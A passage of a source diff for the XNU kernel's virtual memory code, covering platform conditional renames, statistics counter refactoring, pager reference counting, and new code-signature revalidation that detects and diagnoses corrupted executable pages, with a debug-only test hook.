b/osfmk/vm/vm_compressor.h index 9b4cf69eb..f7191c457 100644 --- a/osfmk/vm/vm_compressor.h +++ b/osfmk/vm/vm_compressor.h @@ -468,13 +468,13 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo #define VM_PAGE_COMPRESSOR_SWAP_CATCHUP_THRESHOLD (((AVAILABLE_MEMORY) * 10) / (vm_compressor_catchup_threshold_divisor ? 
vm_compressor_catchup_threshold_divisor : 10)) #define VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD (((AVAILABLE_MEMORY) * 9) / (vm_compressor_catchup_threshold_divisor ? vm_compressor_catchup_threshold_divisor : 9)) -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define AVAILABLE_NON_COMPRESSED_MIN 20000 #define COMPRESSOR_NEEDS_TO_SWAP() (((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) || \ (AVAILABLE_NON_COMPRESSED_MEMORY < AVAILABLE_NON_COMPRESSED_MIN)) ? 1 : 0) -#else +#else /* !XNU_TARGET_OS_OSX */ #define COMPRESSOR_NEEDS_TO_SWAP() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) ? 1 : 0) -#endif +#endif /* !XNU_TARGET_OS_OSX */ #define HARD_THROTTLE_LIMIT_REACHED() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD) ? 1 : 0) #define SWAPPER_NEEDS_TO_UNTHROTTLE() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_UNTHROTTLE_THRESHOLD) ? 1 : 0) @@ -484,11 +484,11 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo #define COMPRESSOR_NEEDS_TO_MINOR_COMPACT() ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_COMPACT_THRESHOLD) ? 
1 : 0) -#ifdef CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define COMPRESSOR_FREE_RESERVED_LIMIT 28 -#else +#else /* !XNU_TARGET_OS_OSX */ #define COMPRESSOR_FREE_RESERVED_LIMIT 128 -#endif +#endif /* !XNU_TARGET_OS_OSX */ uint32_t vm_compressor_get_encode_scratch_size(void) __pure2; uint32_t vm_compressor_get_decode_scratch_size(void) __pure2; diff --git a/osfmk/vm/vm_compressor_backing_store.c b/osfmk/vm/vm_compressor_backing_store.c index 0c98c24a4..01a41f9de 100644 --- a/osfmk/vm/vm_compressor_backing_store.c +++ b/osfmk/vm/vm_compressor_backing_store.c @@ -127,7 +127,7 @@ extern int vnode_getwithref(struct vnode* vp); boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE; -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX /* * For CONFIG_FREEZE, we scale the c_segments_limit based on the @@ -145,7 +145,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE; ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0) #define VM_SWAP_SHOULD_TRIM(swf) ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0) -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define VM_MAX_SWAP_FILE_NUM 100 #define VM_SWAPFILE_DELAYED_TRIM_MAX 128 @@ -156,7 +156,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE; ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0) #define VM_SWAP_SHOULD_TRIM(swf) ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0) -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #define VM_SWAP_SHOULD_RECLAIM() (((vm_swap_force_reclaim == TRUE) || ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) >= SWAPFILE_RECLAIM_THRESHOLD_SEGS)) ? 1 : 0) #define VM_SWAP_SHOULD_ABORT_RECLAIM() (((vm_swap_force_reclaim == FALSE) && ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) <= SWAPFILE_RECLAIM_MINIMUM_SEGS)) ? 
1 : 0) @@ -446,7 +446,7 @@ vm_compressor_swap_init() proc_set_thread_policy_with_tid(kernel_task, thread->thread_id, TASK_POLICY_INTERNAL, TASK_POLICY_PASSIVE_IO, TASK_POLICY_ENABLE); -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX /* * dummy value until the swap file gets created * when we drive the first c_segment_t to the @@ -454,9 +454,20 @@ vm_compressor_swap_init() * know the true size we have to work with */ c_overage_swapped_limit = 16; -#endif +#endif /* !XNU_TARGET_OS_OSX */ vm_num_swap_files_config = VM_MAX_SWAP_FILE_NUM; +#if DEVELOPMENT || DEBUG + typeof(vm_num_swap_files_config) parsed_vm_max_num_swap_files = 0; + if (PE_parse_boot_argn("vm_max_num_swap_files", &parsed_vm_max_num_swap_files, sizeof(parsed_vm_max_num_swap_files))) { + if (parsed_vm_max_num_swap_files > 0) { + vm_num_swap_files_config = parsed_vm_max_num_swap_files; + } else { + printf("WARNING: Ignoring vm_max_num_swap_files=%d boot-arg. Value must be > 0\n", parsed_vm_max_num_swap_files); + } + } +#endif + printf("Maximum number of VM swap files: %d\n", vm_num_swap_files_config); printf("VM Swap Subsystem is ON\n"); } @@ -534,14 +545,14 @@ vm_compaction_swapper_do_init(void) vm_compressor_catchup_threshold_divisor = 30; } } -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX vnode_setswapmount(vp); vm_swappin_avail = vnode_getswappin_avail(vp); if (vm_swappin_avail) { vm_swappin_enabled = TRUE; } -#endif +#endif /* XNU_TARGET_OS_OSX */ vm_swapfile_close((uint64_t)pathname, vp); } kheap_free(KHEAP_TEMP, pathname, namelen); @@ -1261,7 +1272,7 @@ vm_swapout_finish(c_segment_t c_seg, uint64_t f_offset, uint32_t size, kern_retu c_seg->c_store.c_swap_handle = f_offset; - VM_STAT_INCR_BY(swapouts, size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapouts, size >> PAGE_SHIFT); if (c_seg->c_bytes_used) { OSAddAtomic64(-c_seg->c_bytes_used, &compressor_bytes_used); @@ -1421,7 +1432,7 @@ vm_swap_create_file() lck_mtx_unlock(&vm_swap_data_lock); thread_wakeup((event_t) &vm_num_swap_files); -#if 
CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX if (vm_num_swap_files == 1) { c_overage_swapped_limit = (uint32_t)size / C_SEG_BUFSIZE; @@ -1429,7 +1440,7 @@ vm_swap_create_file() c_overage_swapped_limit /= 2; } } -#endif +#endif /* !XNU_TARGET_OS_OSX */ break; } else { size = size / 2; @@ -1487,7 +1498,7 @@ vm_swap_get(c_segment_t c_seg, uint64_t f_offset, uint64_t size) C_SEG_WRITE_PROTECT(c_seg); #endif if (retval == 0) { - VM_STAT_INCR_BY(swapins, size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapins, size >> PAGE_SHIFT); } else { vm_swap_get_failures++; } @@ -2078,7 +2089,7 @@ ReTry_for_cseg: vnode_put(swf->swp_vp); } - VM_STAT_INCR_BY(swapins, c_size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapins, c_size >> PAGE_SHIFT); if (vm_swap_put(addr, &f_offset, c_size, c_seg, NULL)) { vm_offset_t c_buffer; @@ -2105,7 +2116,7 @@ ReTry_for_cseg: goto swap_io_failed; } - VM_STAT_INCR_BY(swapouts, c_size >> PAGE_SHIFT); + counter_add(&vm_statistics_swapouts, c_size >> PAGE_SHIFT); lck_mtx_lock_spin_always(&c_seg->c_lock); diff --git a/osfmk/vm/vm_compressor_backing_store.h b/osfmk/vm/vm_compressor_backing_store.h index c8a03a235..da6f6e33c 100644 --- a/osfmk/vm/vm_compressor_backing_store.h +++ b/osfmk/vm/vm_compressor_backing_store.h @@ -37,19 +37,19 @@ #include #include -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX #define MIN_SWAP_FILE_SIZE (64 * 1024 * 1024ULL) #define MAX_SWAP_FILE_SIZE (128 * 1024 * 1024ULL) -#else /* CONFIG_EMBEDDED */ +#else /* !XNU_TARGET_OS_OSX */ #define MIN_SWAP_FILE_SIZE (256 * 1024 * 1024ULL) #define MAX_SWAP_FILE_SIZE (1 * 1024 * 1024 * 1024ULL) -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #define COMPRESSED_SWAP_CHUNK_SIZE (C_SEG_BUFSIZE) diff --git a/osfmk/vm/vm_compressor_pager.c b/osfmk/vm/vm_compressor_pager.c index 2b7dfe4bb..637798bfd 100644 --- a/osfmk/vm/vm_compressor_pager.c +++ b/osfmk/vm/vm_compressor_pager.c @@ -157,7 +157,11 @@ typedef struct compressor_pager { /* pager-specific data */ lck_mtx_t cpgr_lock; 
- unsigned int cpgr_references; +#if MEMORY_OBJECT_HAS_REFCOUNT +#define cpgr_references cpgr_hdr.mo_ref +#else + os_ref_atomic_t cpgr_references; +#endif unsigned int cpgr_num_slots; unsigned int cpgr_num_slots_occupied; union { @@ -340,8 +344,7 @@ compressor_memory_object_reference( } compressor_pager_lock(pager); - assert(pager->cpgr_references > 0); - pager->cpgr_references++; + os_ref_retain_locked_raw(&pager->cpgr_references, NULL); compressor_pager_unlock(pager); } @@ -365,7 +368,7 @@ compressor_memory_object_deallocate( } compressor_pager_lock(pager); - if (--pager->cpgr_references > 0) { + if (os_ref_release_locked_raw(&pager->cpgr_references, NULL) > 0) { compressor_pager_unlock(pager); return; } @@ -579,7 +582,7 @@ compressor_memory_object_create( } compressor_pager_lock_init(pager); - pager->cpgr_references = 1; + os_ref_init_raw(&pager->cpgr_references, NULL); pager->cpgr_num_slots = (uint32_t)(new_size / PAGE_SIZE); pager->cpgr_num_slots_occupied = 0; @@ -727,7 +730,7 @@ vm_compressor_pager_init(void) sizeof(struct compressor_pager), ZC_NOENCRYPT, ZONE_ID_ANY, ^(zone_t z){ #if defined(__LP64__) - zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); #else (void)z; #endif /* defined(__LP64__) */ @@ -739,7 +742,7 @@ vm_compressor_pager_init(void) compressor_slots_zones_names[idx], compressor_slots_zones_sizes[idx], ZC_NONE, ZONE_ID_ANY, ^(zone_t z){ - zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); }); } #endif /* defined(__LP64__) */ diff --git a/osfmk/vm/vm_fault.c b/osfmk/vm/vm_fault.c index 43814d16e..207a51413 100644 --- a/osfmk/vm/vm_fault.c +++ b/osfmk/vm/vm_fault.c @@ -77,7 +77,7 @@ #include #include -#include +#include #include #include #include @@ -137,6 +137,9 @@ extern struct vnode *vnode_pager_lookup_vnode(memory_object_t); uint64_t vm_hard_throttle_threshold; +#if DEBUG || DEVELOPMENT +static bool vmtc_panic_instead = 
false; +#endif /* DEBUG || DEVELOPMENT */ OS_ALWAYS_INLINE boolean_t @@ -157,7 +160,7 @@ NEED_TO_HARD_THROTTLE_THIS_TASK(void) #define VM_STAT_DECOMPRESSIONS() \ MACRO_BEGIN \ - VM_STAT_INCR(decompressions); \ + counter_inc(&vm_statistics_decompressions); \ current_thread()->decompressions++; \ MACRO_END @@ -280,6 +283,10 @@ vm_fault_init(void) PE_parse_boot_argn("vm_protect_privileged_from_untrusted", &vm_protect_privileged_from_untrusted, sizeof(vm_protect_privileged_from_untrusted)); + +#if DEBUG || DEVELOPMENT + (void)PE_parse_boot_argn("text_corruption_panic", &vmtc_panic_instead, sizeof(vmtc_panic_instead)); +#endif /* DEBUG || DEVELOPMENT */ } __startup_func @@ -831,7 +838,7 @@ vm_fault_zero_page(vm_page_t m, boolean_t no_zero_fill) } else { vm_page_zero_fill(m); - VM_STAT_INCR(zero_fill_count); + counter_inc(&vm_statistics_zero_fill_count); DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL); } assert(!m->vmp_laundry); @@ -1113,8 +1120,6 @@ vm_fault_page( #endif wait_result = PAGE_SLEEP(object, m, interruptible); - counter(c_vm_fault_page_block_busy_kernel++); - if (wait_result != THREAD_AWAKENED) { vm_fault_cleanup(object, first_m); thread_interrupt_level(interruptible_state); @@ -1334,7 +1339,6 @@ vm_fault_page( vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); vm_object_lock(object); assert(object->ref_count > 0); @@ -1493,7 +1497,6 @@ vm_fault_page( */ vm_object_reference_locked(object); vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); vm_object_lock(object); assert(object->ref_count > 0); @@ -1535,8 +1538,6 @@ vm_fault_page( vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); - vm_object_lock(object); assert(object->ref_count > 0); @@ -2075,7 +2076,7 @@ dont_look_for_page: vm_object_unlock(object); my_fault = DBG_COW_FAULT; - VM_STAT_INCR(cow_faults); + counter_inc(&vm_statistics_cow_faults); DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL); 
current_task()->cow_faults++; @@ -2194,11 +2195,9 @@ dont_look_for_page: vm_object_reference_locked(copy_object); vm_object_unlock(copy_object); vm_fault_cleanup(object, first_m); - counter(c_vm_fault_page_block_backoff_kernel++); vm_object_lock(copy_object); assert(copy_object->ref_count > 0); - VM_OBJ_RES_DECR(copy_object); vm_object_lock_assert_exclusive(copy_object); copy_object->ref_count--; assert(copy_object->ref_count > 0); @@ -2237,7 +2236,6 @@ dont_look_for_page: if (copy_m == VM_PAGE_NULL) { RELEASE_PAGE(m); - VM_OBJ_RES_DECR(copy_object); vm_object_lock_assert_exclusive(copy_object); copy_object->ref_count--; assert(copy_object->ref_count > 0); @@ -2353,7 +2351,6 @@ dont_look_for_page: copy_object->ref_count--; assert(copy_object->ref_count > 0); - VM_OBJ_RES_DECR(copy_object); vm_object_unlock(copy_object); break; @@ -4004,8 +4001,8 @@ vm_fault_internal( fault_type = (change_wiring ? VM_PROT_NONE : caller_prot); - VM_STAT_INCR(faults); - current_task()->faults++; + counter_inc(&vm_statistics_faults); + counter_inc(¤t_task()->faults); original_fault_type = fault_type; need_copy = FALSE; @@ -4323,8 +4320,6 @@ RetryFault: if (result == THREAD_WAITING) { result = thread_block(THREAD_CONTINUE_NULL); - - counter(c_vm_fault_page_block_busy_kernel++); } if (result == THREAD_AWAKENED || result == THREAD_RESTART) { goto RetryFault; @@ -4793,7 +4788,7 @@ FastPmapEnter: vm_fault_collapse_total++; type_of_fault = DBG_COW_FAULT; - VM_STAT_INCR(cow_faults); + counter_inc(&vm_statistics_cow_faults); DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL); current_task()->cow_faults++; @@ -5187,7 +5182,7 @@ FastPmapEnter: * lock across the zero fill. 
*/ vm_page_zero_fill(m); - VM_STAT_INCR(zero_fill_count); + counter_inc(&vm_statistics_zero_fill_count); DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL); } if (page_needs_data_sync) { @@ -6302,10 +6297,10 @@ vm_fault_wire_fast( vm_map_offset_t fault_phys_offset; struct vm_object_fault_info fault_info = {}; - VM_STAT_INCR(faults); + counter_inc(&vm_statistics_faults); if (thread != THREAD_NULL && thread->task != TASK_NULL) { - thread->task->faults++; + counter_inc(&thread->task->faults); } /* @@ -7229,13 +7224,11 @@ vm_page_validate_cs_mapped( } } -void -vm_page_validate_cs( - vm_page_t page, - vm_map_size_t fault_page_size, - vm_map_offset_t fault_phys_offset) +static void +vm_page_map_and_validate_cs( + vm_object_t object, + vm_page_t page) { - vm_object_t object; vm_object_offset_t offset; vm_map_offset_t koffset; vm_map_size_t ksize; @@ -7244,12 +7237,6 @@ vm_page_validate_cs( boolean_t busy_page; boolean_t need_unmap; - object = VM_PAGE_OBJECT(page); - vm_object_lock_assert_held(object); - - if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) { - return; - } vm_object_lock_assert_exclusive(object); assert(object->code_signed); @@ -7305,6 +7292,23 @@ vm_page_validate_cs( vm_object_paging_end(object); } +void +vm_page_validate_cs( + vm_page_t page, + vm_map_size_t fault_page_size, + vm_map_offset_t fault_phys_offset) +{ + vm_object_t object; + + object = VM_PAGE_OBJECT(page); + vm_object_lock_assert_held(object); + + if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) { + return; + } + vm_page_map_and_validate_cs(object, page); +} + void vm_page_validate_cs_mapped_chunk( vm_page_t page, @@ -7477,3 +7481,550 @@ vmrtf_extract(uint64_t cupid, __unused boolean_t isroot, unsigned long vrecordsz *vmrtfrv = numextracted; return early_exit; } + +/* + * Only allow one diagnosis to be in flight at a time, to avoid + * creating too much additional memory usage. 
+ */ +static volatile uint_t vmtc_diagnosing; +unsigned int vmtc_total; +unsigned int vmtc_undiagnosed; +unsigned int vmtc_not_eligible; +unsigned int vmtc_copyin_fail; +unsigned int vmtc_not_found; +unsigned int vmtc_one_bit_flip; +unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1]; + +#if DEVELOPMENT || DEBUG +/* + * Keep around the last diagnosed corruption buffers to aid in debugging. + */ +static size_t vmtc_last_buffer_size; +static uint64_t *vmtc_last_before_buffer = NULL; +static uint64_t *vmtc_last_after_buffer = NULL; +#endif /* DEVELOPMENT || DEBUG */ + +/* + * Set things up so we can diagnose a potential text page corruption. + */ +static uint64_t * +vmtc_text_page_diagnose_setup( + vm_map_offset_t code_addr) +{ + uint64_t *buffer; + size_t size = MIN(vm_map_page_size(current_map()), PAGE_SIZE); + + (void)OSAddAtomic(1, &vmtc_total); + + /* + * If another is being diagnosed, skip this one. + */ + if (!OSCompareAndSwap(0, 1, &vmtc_diagnosing)) { + (void)OSAddAtomic(1, &vmtc_undiagnosed); + return NULL; + } + + /* + * Get the contents of the corrupt page. + */ + buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK); + if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), buffer, size) != 0) { + /* copyin error, so undo things */ + kheap_free(KHEAP_DEFAULT, buffer, size); + (void)OSAddAtomic(1, &vmtc_undiagnosed); + ++vmtc_copyin_fail; + if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) { + panic("Bad compare and swap in setup!"); + } + return NULL; + } + return buffer; +} + +/* + * Diagnose the text page by comparing its contents with + * the one we've previously saved. 
+ */ +static void +vmtc_text_page_diagnose( + vm_map_offset_t code_addr, + uint64_t *old_code_buffer) +{ + uint64_t *new_code_buffer; + size_t size = MIN(vm_map_page_size(current_map()), PAGE_SIZE); + uint_t count = (uint_t)size / sizeof(uint64_t); + uint_t diff_count = 0; + bool bit_flip = false; + uint_t b; + uint64_t *new; + uint64_t *old; + + new_code_buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK); + if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), new_code_buffer, size) != 0) { + /* copyin error, so undo things */ + (void)OSAddAtomic(1, &vmtc_undiagnosed); + ++vmtc_copyin_fail; + goto done; + } + + new = new_code_buffer; + old = old_code_buffer; + for (; count-- > 0; ++new, ++old) { + if (*new == *old) { + continue; + } + + /* + * On first diff, check for a single bit flip + */ + if (diff_count == 0) { + uint64_t x = (*new ^ *old); + assert(x != 0); + if ((x & (x - 1)) == 0) { + bit_flip = true; + ++diff_count; + continue; + } + } + + /* + * count up the number of different bytes. + */ + for (b = 0; b < sizeof(uint64_t); ++b) { + char *n = (char *)new; + char *o = (char *)old; + if (n[b] != o[b]) { + ++diff_count; + } + } + + /* quit counting when too many */ + if (diff_count > (1 << MAX_TRACK_POWER2)) { + break; + } + } + + if (diff_count > 1) { + bit_flip = false; + } + + if (diff_count == 0) { + ++vmtc_not_found; + } else if (bit_flip) { + ++vmtc_one_bit_flip; + ++vmtc_byte_counts[0]; + } else { + for (b = 0; b <= MAX_TRACK_POWER2; ++b) { + if (diff_count <= (1 << b)) { + ++vmtc_byte_counts[b]; + break; + } + } + if (diff_count > (1 << MAX_TRACK_POWER2)) { + ++vmtc_byte_counts[MAX_TRACK_POWER2]; + } + } + +done: + /* + * Free up the code copy buffers, but save the last + * set on development / debug kernels in case they + * can provide evidence for debugging memory stomps. 
+ */ +#if DEVELOPMENT || DEBUG + if (vmtc_last_before_buffer != NULL) { + kheap_free(KHEAP_DEFAULT, vmtc_last_before_buffer, vmtc_last_buffer_size); + } + if (vmtc_last_after_buffer != NULL) { + kheap_free(KHEAP_DEFAULT, vmtc_last_after_buffer, vmtc_last_buffer_size); + } + vmtc_last_before_buffer = old_code_buffer; + vmtc_last_after_buffer = new_code_buffer; + vmtc_last_buffer_size = size; +#else /* DEVELOPMENT || DEBUG */ + kheap_free(KHEAP_DEFAULT, new_code_buffer, size); + kheap_free(KHEAP_DEFAULT, old_code_buffer, size); +#endif /* DEVELOPMENT || DEBUG */ + + /* + * We're finished, so clear the diagnosing flag. + */ + if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) { + panic("Bad compare and swap in diagnose!"); + } +} + +/* + * For the given map, virt address, find the object, offset, and page. + * This has to lookup the map entry, verify protections, walk any shadow chains. + * If found, returns with the object locked. + */ +static kern_return_t +vmtc_revalidate_lookup( + vm_map_t map, + vm_map_offset_t vaddr, + vm_object_t *ret_object, + vm_object_offset_t *ret_offset, + vm_page_t *ret_page) +{ + vm_object_t object; + vm_object_offset_t offset; + vm_page_t page; + kern_return_t kr = KERN_SUCCESS; + uint8_t object_lock_type = OBJECT_LOCK_EXCLUSIVE; + vm_map_version_t version; + boolean_t wired; + struct vm_object_fault_info fault_info = {}; + vm_map_t real_map = NULL; + vm_prot_t prot; + vm_object_t shadow; + + /* + * Find the object/offset for the given location/map. + * Note this returns with the object locked. 
+ */ +restart: + vm_map_lock_read(map); + object = VM_OBJECT_NULL; /* in case we come around the restart path */ + kr = vm_map_lookup_locked(&map, vaddr, VM_PROT_READ, + object_lock_type, &version, &object, &offset, &prot, &wired, + &fault_info, &real_map, NULL); + vm_map_unlock_read(map); + if (real_map != NULL && real_map != map) { + vm_map_unlock(real_map); + } + + /* + * If there's no mapping here, or if we fail because the page + * wasn't mapped executable, we can ignore this. + */ + if (kr != KERN_SUCCESS || + object == NULL || + !(prot & VM_PROT_EXECUTE)) { + kr = KERN_FAILURE; + goto done; + } + + /* + * Chase down any shadow chains to find the actual page. + */ + for (;;) { + /* + * See if the page is on the current object. + */ + page = vm_page_lookup(object, vm_object_trunc_page(offset)); + if (page != NULL) { + /* restart the lookup */ + if (page->vmp_restart) { + vm_object_unlock(object); + goto restart; + } + + /* + * If this page is busy, we need to wait for it. + */ + if (page->vmp_busy) { + PAGE_SLEEP(object, page, TRUE); + vm_object_unlock(object); + goto restart; + } + break; + } + + /* + * If the object doesn't have the page and + * has no shadow, then we can quit. + */ + shadow = object->shadow; + if (shadow == NULL) { + kr = KERN_FAILURE; + goto done; + } + + /* + * Move to the next object + */ + offset += object->vo_shadow_offset; + vm_object_lock(shadow); + vm_object_unlock(object); + object = shadow; + shadow = VM_OBJECT_NULL; + } + *ret_object = object; + *ret_offset = vm_object_trunc_page(offset); + *ret_page = page; + +done: + if (kr != KERN_SUCCESS && object != NULL) { + vm_object_unlock(object); + } + return kr; +} + +/* + * Check if a page is wired, needs extra locking. + */ +static bool +is_page_wired(vm_page_t page) +{ + bool result; + vm_page_lock_queues(); + result = VM_PAGE_WIRED(page); + vm_page_unlock_queues(); + return result; +} + +/* + * A fatal process error has occurred in the given task. 
+ * Recheck the code signing of the text page at the given + * address to check for a text page corruption. + * + * Returns KERN_FAILURE if a page was found to be corrupt + * by failing to match its code signature. KERN_SUCCESS + * means the page is either valid or we don't have the + * information to say it's corrupt. + */ +kern_return_t +revalidate_text_page(task_t task, vm_map_offset_t code_addr) +{ + kern_return_t kr; + vm_map_t map; + vm_object_t object = NULL; + vm_object_offset_t offset; + vm_page_t page = NULL; + struct vnode *vnode; + bool do_invalidate = false; + uint64_t *diagnose_buffer = NULL; + + map = task->map; + if (task->map == NULL) { + return KERN_SUCCESS; + } + + kr = vmtc_revalidate_lookup(map, code_addr, &object, &offset, &page); + if (kr != KERN_SUCCESS) { + goto done; + } + + /* + * The object needs to have a pager. + */ + if (object->pager == NULL) { + goto done; + } + + /* + * Needs to be a vnode backed page to have a signature. + */ + vnode = vnode_pager_lookup_vnode(object->pager); + if (vnode == NULL) { + goto done; + } + + /* + * Object checks to see if we should proceed. + */ + if (!object->code_signed || /* no code signature to check */ + object->internal || /* internal objects aren't signed */ + object->terminating || /* the object and its pages are already going away */ + !object->pager_ready) { /* this shouldn't happen, but check shouldn't hurt */ + goto done; + } + + /* + * Check the code signature of the page in question. + */ + vm_page_map_and_validate_cs(object, page); + + /* + * At this point: + * vmp_cs_validated |= validated (set if a code signature exists) + * vmp_cs_tainted |= tainted (set if code signature violation) + * vmp_cs_nx |= nx; ?? + * + * if vmp_pmapped then have to pmap_disconnect.. + * other flags to check on object or page? + */ + if (page->vmp_cs_tainted != VMP_CS_ALL_FALSE) { +#if DEBUG || DEVELOPMENT + /* + * On development builds, a boot-arg can be used to cause + * a panic, instead of a quiet repair.
+ */ + if (vmtc_panic_instead) { + panic("Text page corruption detected: vm_page_t 0x%llx\n", (long long)(uintptr_t)page); + } +#endif /* DEBUG || DEVELOPMENT */ + + /* + * We're going to invalidate this page. Mark it as busy so we can + * drop the object lock and use copyin() to save its contents. + */ + do_invalidate = true; + assert(!page->vmp_busy); + page->vmp_busy = TRUE; + vm_object_unlock(object); + diagnose_buffer = vmtc_text_page_diagnose_setup(code_addr); + } + +done: + if (do_invalidate) { + vm_object_lock(object); + assert(page->vmp_busy); + assert(VM_PAGE_OBJECT(page) == object); /* Since the page was busy, this shouldn't change */ + assert(page->vmp_offset == offset); + PAGE_WAKEUP_DONE(page); /* make no longer busy */ + + /* + * Invalidate, i.e. toss, the corrupted page. + */ + if (!page->vmp_cleaning && + !page->vmp_laundry && + !page->vmp_fictitious && + !page->vmp_precious && + !page->vmp_absent && + !page->vmp_error && + !page->vmp_dirty && + !is_page_wired(page)) { + if (page->vmp_pmapped) { + int refmod = pmap_disconnect(VM_PAGE_GET_PHYS_PAGE(page)); + if (refmod & VM_MEM_MODIFIED) { + SET_PAGE_DIRTY(page, FALSE); + } + if (refmod & VM_MEM_REFERENCED) { + page->vmp_reference = TRUE; + } + } + /* If the page seems intentionally modified, don't trash it. */ + if (!page->vmp_dirty) { + VM_PAGE_FREE(page); + } else { + (void)OSAddAtomic(1, &vmtc_not_eligible); + } + } else { + (void)OSAddAtomic(1, &vmtc_not_eligible); + } + vm_object_unlock(object); + + /* + * Now try to diagnose the type of failure by faulting + * in a new copy and diff'ing it with what we saved. + */ + if (diagnose_buffer) { + vmtc_text_page_diagnose(code_addr, diagnose_buffer); + } + return KERN_FAILURE; + } + + if (object != NULL) { + vm_object_unlock(object); + } + return KERN_SUCCESS; +} + +#if DEBUG || DEVELOPMENT +/* + * For implementing unit tests - ask the pmap to corrupt a text page. + * We have to find the page, to get the physical address, then invoke + * the pmap.
+ */ +extern kern_return_t vm_corrupt_text_addr(uintptr_t); + +kern_return_t +vm_corrupt_text_addr(uintptr_t va) +{ + task_t task = current_task(); + vm_map_t map; + kern_return_t kr = KERN_SUCCESS; + vm_object_t object = VM_OBJECT_NULL; + vm_object_offset_t offset; + vm_page_t page = NULL; + pmap_paddr_t pa; + + map = task->map; + if (task->map == NULL) { + printf("corrupt_text_addr: no map\n"); + return KERN_FAILURE; + } + + kr = vmtc_revalidate_lookup(map, (vm_map_offset_t)va, &object, &offset, &page); + if (kr != KERN_SUCCESS) { + printf("corrupt_text_addr: page lookup failed\n"); + return kr; + } + /* get the physical address to use */ + pa = ptoa(VM_PAGE_GET_PHYS_PAGE(page)) + (va - vm_object_trunc_page(va)); + + /* + * Check we have something we can work with. + * Due to racing with pageout as we enter the sysctl, + * it's theoretically possible to have the page disappear, just + * before the lookup. + * + * That's highly likely to happen often. I've filed a radar 72857482 + * to bubble up the error here to the sysctl result and have the + * test not FAIL in that case. 
+ */ + if (page->vmp_busy) { + printf("corrupt_text_addr: vmp_busy\n"); + kr = KERN_FAILURE; + } + if (page->vmp_cleaning) { + printf("corrupt_text_addr: vmp_cleaning\n"); + kr = KERN_FAILURE; + } + if (page->vmp_laundry) { + printf("corrupt_text_addr: vmp_cleaning\n"); + kr = KERN_FAILURE; + } + if (page->vmp_fictitious) { + printf("corrupt_text_addr: vmp_fictitious\n"); + kr = KERN_FAILURE; + } + if (page->vmp_precious) { + printf("corrupt_text_addr: vmp_precious\n"); + kr = KERN_FAILURE; + } + if (page->vmp_absent) { + printf("corrupt_text_addr: vmp_absent\n"); + kr = KERN_FAILURE; + } + if (page->vmp_error) { + printf("corrupt_text_addr: vmp_error\n"); + kr = KERN_FAILURE; + } + if (page->vmp_dirty) { + printf("corrupt_text_addr: vmp_dirty\n"); + kr = KERN_FAILURE; + } + if (is_page_wired(page)) { + printf("corrupt_text_addr: wired\n"); + kr = KERN_FAILURE; + } + if (!page->vmp_pmapped) { + printf("corrupt_text_addr: !vmp_pmapped\n"); + kr = KERN_FAILURE; + } + + if (kr == KERN_SUCCESS) { + printf("corrupt_text_addr: using physaddr 0x%llx\n", (long long)pa); + kr = pmap_test_text_corruption(pa); + if 